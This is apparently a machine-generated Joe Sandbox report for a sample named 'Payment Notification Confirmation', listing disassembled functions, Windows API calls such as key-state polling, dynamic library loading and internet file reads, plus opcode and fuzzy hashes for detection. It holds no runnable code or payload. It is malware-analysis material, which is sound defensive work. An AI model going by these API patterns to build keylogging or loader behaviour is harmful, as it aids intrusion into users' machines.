Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 2c851f26000c1a6d1bb87782e67b3cd3eeb0da14f1a6a41181fb639c2d3d6406
Instruction ID: d0833e571d8948698d3f521805adb9b853b69ce52e6e50a30e7896ce9713ac12
Opcode Fuzzy Hash: 2c851f26000c1a6d1bb87782e67b3cd3eeb0da14f1a6a41181fb639c2d3d6406
Instruction Fuzzy Hash: CE5158B5A10219EFCB14CF68C894EAABBF9FF89310B158559E909DB350E734E911CF90

Function 009A8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009A8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 009A8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009A8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009A8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009A8C5F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 1855be1dbf93af953fce7e659a7cc5cb5dd645044606b64d182bdb00b619067b
Instruction ID: 099c9579ded6ad17e27a1408f5782d65e280476cac4865777456cac1d1a9a239
Opcode Fuzzy Hash: 1855be1dbf93af953fce7e659a7cc5cb5dd645044606b64d182bdb00b619067b
Instruction Fuzzy Hash: 72515A75A00219AFCB14DF65C880E6ABBF5FF89314F088458E849AB362CB31ED51CF90

Function 009B8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 009B8F40
GetProcAddress.KERNEL32(00000000,?), ref: 009B8FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 009B8FEC
GetProcAddress.KERNEL32(00000000,?), ref: 009B9032
FreeLibrary.KERNEL32(00000000), ref: 009B9052

Part of subcall function 0094F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,009A1043,?,75C0E610), ref: 0094F6E6
Part of subcall function 0094F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0098FA64,00000000,00000000,?,?,009A1043,?,75C0E610,?,0098FA64), ref: 0094F70D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: ca4d63beb7c2ef33c0e8c4749dc420bb246adcdb4329b3ea3e2162915627d3f2
Instruction ID: 6b53ea89c12aedd02e521985ce7ac0c8c2dd968bcf047f14d250495db3d19c41
Opcode Fuzzy Hash: ca4d63beb7c2ef33c0e8c4749dc420bb246adcdb4329b3ea3e2162915627d3f2
Instruction Fuzzy Hash: 91514935604205DFCB10EF58C5949ADBBB5FF89324F088098E90A9B362DB31ED86CF90

Function 009C6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 009C6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 009C6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 009C6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,009AAB79,00000000,00000000), ref: 009C6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 009C6CC7

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 963f628abad869f63a2cbef2aa0dae244d431ea555ddc73210c7661e33c28a37
Instruction ID: 5b55a85d0774d123ecd208003ded4c44dc8209911fda82252aad12a2e2d59c79
Opcode Fuzzy Hash: 963f628abad869f63a2cbef2aa0dae244d431ea555ddc73210c7661e33c28a37
Instruction Fuzzy Hash: A741D235E44104AFDB24CF68CD58FA97FA9EB49350F14022CFAD9A72E1C371AD41DA81

Function 00962051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009620C3
_free.LIBCMT ref: 009620E3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d46ac16b5a1a6dfd603a5ea2dc33d5093ffb554f4245554155e871d79f7d46ec
Instruction ID: 96e3faf3323a49f5ef7a25f1d8aa4bdc4094c47462cefdb774a23b6e36d88398
Opcode Fuzzy Hash: d46ac16b5a1a6dfd603a5ea2dc33d5093ffb554f4245554155e871d79f7d46ec
Instruction Fuzzy Hash: 6B41F672A006049FCB24DF78C981A6EB7F5EF89314F154569E915EB351DB31ED01DB80

Function 0094912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00949141
ScreenToClient.USER32(00000000,?), ref: 0094915E
GetAsyncKeyState.USER32(00000001), ref: 00949183
GetAsyncKeyState.USER32(00000002), ref: 0094919D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 022d687631c44d8d6e1181e53ba48db3a4a20cdf332c98fbfd19575f3f96a5c3
Instruction ID: 2af70f817753f6f0e77b780790b97b2ac0e5ac13cabdd3d11295c17f7bdf7e10
Opcode Fuzzy Hash: 022d687631c44d8d6e1181e53ba48db3a4a20cdf332c98fbfd19575f3f96a5c3
Instruction Fuzzy Hash: DB41607190C60ABBDF15AFA4C848FEEF774FB49320F204619E429A32D0C734A950DB51

Function 009A3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 009A38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 009A3922
TranslateMessage.USER32(?), ref: 009A394B
DispatchMessageW.USER32(?), ref: 009A3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009A3966

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 3f3a0931b4dac074ef28a3e0a844f5e868f7ac13831ebe7fdb52c9d5425b02bf
Instruction ID: 0c0c248b10f86b0a084ec86c4da9e55826b02d5c2b27ac21beaa6793b5839e8a
Opcode Fuzzy Hash: 3f3a0931b4dac074ef28a3e0a844f5e868f7ac13831ebe7fdb52c9d5425b02bf
Instruction Fuzzy Hash: 0031C670908345DFEB25CB749848FB73BACEB47304F04856DF456861A0E3B89686CB91

Function 009ACF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,009AC21E,00000000), ref: 009ACF38
InternetReadFile.WININET(?,00000000,?,?), ref: 009ACF6F
GetLastError.KERNEL32(?,00000000,?,?,?,009AC21E,00000000), ref: 009ACFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,009AC21E,00000000), ref: 009ACFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,009AC21E,00000000), ref: 009ACFF2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 7fba063c568fc85da8f02bef816572d15ee0a1667bef7b11fe3897d153b5ff0a
Instruction ID: 3df9268800dfd33289504387fa66b8afc9bce62fb3f9a14b317c783bef3ab5bd
Opcode Fuzzy Hash: 7fba063c568fc85da8f02bef816572d15ee0a1667bef7b11fe3897d153b5ff0a
Instruction Fuzzy Hash: 63315EB1904205EFDB20DFA5C884EABBBFDEB15355B10442EF51AD6140DB30EE41DBA0

Function 00991901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00991915
PostMessageW.USER32(00000001,00000201,00000001), ref: 009919C1
Sleep.KERNEL32(00000000,?,?,?), ref: 009919C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 009919DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 009919E2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: bdd7d9230c9dd313e4a00b7cdd5ff34d1281cde5761fa03ae54f04fbf2d642bc
Instruction ID: 7d53ed30b57853d6ea9c7facb678856d7bff0966714b9784287568a76e750a66
Opcode Fuzzy Hash: bdd7d9230c9dd313e4a00b7cdd5ff34d1281cde5761fa03ae54f04fbf2d642bc
Instruction Fuzzy Hash: 6431AD71A0021AEFDF00CFACDA99ADE3BB9FB44315F104229F925A72D1C7709944DB90

Function 009C5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 009C5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 009C579D
_wcslen.LIBCMT ref: 009C57AF
_wcslen.LIBCMT ref: 009C57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 009C5816

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: f058b80432790855ebf2f40e01db33dbb702fb0ff8215c8b68c973ca969dbbce
Instruction ID: e98262031ecea29514abcfc1b3b0662ac35e47002b96dee80b6cd141a808947e
Opcode Fuzzy Hash: f058b80432790855ebf2f40e01db33dbb702fb0ff8215c8b68c973ca969dbbce
Instruction Fuzzy Hash: C621C171D046089ADB209FA1CC85FEE7BBCFF40724F10865AE929EA194D770AAC5CF51

Function 009B0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 009B0951
GetForegroundWindow.USER32 ref: 009B0968
GetDC.USER32(00000000), ref: 009B09A4
GetPixel.GDI32(00000000,?,00000003), ref: 009B09B0
ReleaseDC.USER32(00000000,00000003), ref: 009B09E8

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: b3eb84403cd27ccaee376fd26170af38c709225e40593472dd5ce63014ea1354
Instruction ID: 16b89c72c5d950c45aebc71cf9cbb206bcc32f530a33df06bc7855c6e5bf6124
Opcode Fuzzy Hash: b3eb84403cd27ccaee376fd26170af38c709225e40593472dd5ce63014ea1354
Instruction Fuzzy Hash: 55218475A04204AFD704EF65C948E9EBBE9EF89750F148468F84A97751CB30AC44DF90

Function 0094990E Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009498CC
SetTextColor.GDI32(?,?), ref: 009498D6
SetBkMode.GDI32(?,00000001), ref: 009498E9
GetStockObject.GDI32(00000005), ref: 009498F1
GetWindowLongW.USER32(?,000000EB), ref: 00949952

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 244ccfa9c1ebf6be86c960dee7b6a63dfd85d5aacd458e1930787c1920722779
Instruction ID: 20e1e9d2c50af37fe18a3a065dbc91e8d15f0feb634e6846a8a47b0f4cceb978
Opcode Fuzzy Hash: 244ccfa9c1ebf6be86c960dee7b6a63dfd85d5aacd458e1930787c1920722779
Instruction Fuzzy Hash: 3721F3719492509FC7228F35EC69EE73FA89F53330B18029DF5968B2A2C7364942DB50

Function 0096CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0096CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0096CDE9

Part of subcall function 00963820: RtlAllocateHeap.NTDLL(00000000,?,00A01444,?,0094FDF5,?,?,0093A976,00000010,00A01440,009313FC,?,009313C6,?,00931129), ref: 00963852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0096CE0F
_free.LIBCMT ref: 0096CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0096CE31

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 1423da89761b5f1b8ca49d7a1b968f19488e5cee7115bedb13b628f166d38935
Instruction ID: c865c6c18cc242d6d6444ad95b466763b513ede718854825c515875abe368fc4
Opcode Fuzzy Hash: 1423da89761b5f1b8ca49d7a1b968f19488e5cee7115bedb13b628f166d38935
Instruction Fuzzy Hash: F30184F2A066157F232216B66C88D7B7E7DDEC6BA13150129F949D7201EA6A8D01A2B0

Function 00949639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00949693
SelectObject.GDI32(?,00000000), ref: 009496A2
BeginPath.GDI32(?), ref: 009496B9
SelectObject.GDI32(?,00000000), ref: 009496E2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 75f94b6e99b94446a91e55c893e31a762cf6fc767041b06a87404b3d7e72202d
Instruction ID: 4f99f37ac90478fc60bfc6de17580244e381f288f8a3c0e04daf7165caae210d
Opcode Fuzzy Hash: 75f94b6e99b94446a91e55c893e31a762cf6fc767041b06a87404b3d7e72202d
Instruction Fuzzy Hash: E8218B70816309EFDF11DFA5EC58FEA7BA8BB503A5F110216F824A61B0D3709893DB90

Function 00995711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00995726
_memcmp.LIBVCRUNTIME ref: 00995744
_memcmp.LIBVCRUNTIME ref: 00995757
_memcmp.LIBVCRUNTIME ref: 0099576F
_memcmp.LIBVCRUNTIME ref: 00995787

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a9a3f8c1735c9a460a388b2ab665538771fcd2920515a707455322a550d72248
Instruction ID: 4d5b0b2a497249b66a1c7c9026dda4660bc00d9f8c0850b305567661979336cc
Opcode Fuzzy Hash: a9a3f8c1735c9a460a388b2ab665538771fcd2920515a707455322a550d72248
Instruction Fuzzy Hash: A201F561781609BBEA099659ADA2FBB735D9BA1399F014024FD089A241F730EF1483B1

Function 00962DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0095F2DE,00963863,00A01444,?,0094FDF5,?,?,0093A976,00000010,00A01440,009313FC,?,009313C6), ref: 00962DFD
_free.LIBCMT ref: 00962E32
_free.LIBCMT ref: 00962E59
SetLastError.KERNEL32(00000000,00931129), ref: 00962E66
SetLastError.KERNEL32(00000000,00931129), ref: 00962E6F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 839f652f8ad80cc61358f9cc2aedcd7c6a794586cdbd588716da78c432c333ea
Instruction ID: 7f9a953e5339b4bec59f2d4874838dc7a3fbfe4367ae8454d1f4d3defec263e2
Opcode Fuzzy Hash: 839f652f8ad80cc61358f9cc2aedcd7c6a794586cdbd588716da78c432c333ea
Instruction Fuzzy Hash: FE012876649E0077C71327747E49E3B2A5DEBD13B1B258438F425A22D2EF368C015120

Function 0099000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0098FF41,80070057,?,?,?,0099035E), ref: 0099002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0098FF41,80070057,?,?), ref: 00990046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0098FF41,80070057,?,?), ref: 00990054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0098FF41,80070057,?), ref: 00990064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0098FF41,80070057,?,?), ref: 00990070

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: e3a3b8dc24c671965a923df93ced1b3dd3688f1946c8125def8b48ac81dd0212
Instruction ID: 1b042c52f8e04d37e598c43152aded07c5383fd4b3b4bcd3888b148d6324087c
Opcode Fuzzy Hash: e3a3b8dc24c671965a923df93ced1b3dd3688f1946c8125def8b48ac81dd0212
Instruction Fuzzy Hash: C9014BB6A10218BFDF118F69DC44FAA7EEDEB88792F144124F909D6210E775DD40EBA0

Function 0099E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0099E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0099E9A5
Sleep.KERNEL32(00000000), ref: 0099E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0099E9B7
Sleep.KERNEL32 ref: 0099E9F3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
